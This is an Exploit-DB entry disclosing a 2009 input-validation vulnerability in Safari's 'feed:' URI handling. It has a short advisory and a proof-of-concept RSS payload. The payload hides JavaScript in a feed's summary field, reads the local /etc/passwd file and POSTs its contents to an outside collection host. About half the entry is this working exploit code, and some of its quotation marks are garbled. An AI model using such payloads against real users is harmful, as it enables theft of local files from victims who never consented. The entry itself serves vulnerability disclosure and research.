Apple Safari 3.2.2 - 'feed:' URI Multiple Input Validation Vulnerabilities

EDB-ID:

32994




Platform:

Multiple

Date:

2009-05-12


source: https://www.securityfocus.com/bid/34925/info

Apple Safari is prone to multiple input-validation vulnerabilities.

An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious website.

Successfully exploiting these issues will allow the attacker to execute arbitrary JavaScript code in the local security zone. This may allow the attacker to obtain sensitive information that can aid in further attacks; other consequences may also occur.

These issues affect versions prior to Safari 3.2.3. 

<summary>On the Cylon baseship, Cavil confronts the last member of the Final Five.
<script>
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(�GET�, �file:///etc/passwd�, true);
req.send(�);

function processReqChange() {
if (req.readyState == 4) {
contents = req.responseText;
sendit2XSSniper(contents);
}
}
function sendit2XSSniper(stuff){
var req2;
req2 = new XMLHttpRequest();
req2.open(�POST�, �http://www.example.com�, true);
req2.setRequestHeader(�Content-Type�,'application/x-www-form-urlencoded�);
req2.send(�filename=etcpasswd&filecontents=�+escape(stuff));
}
</script>
</summary>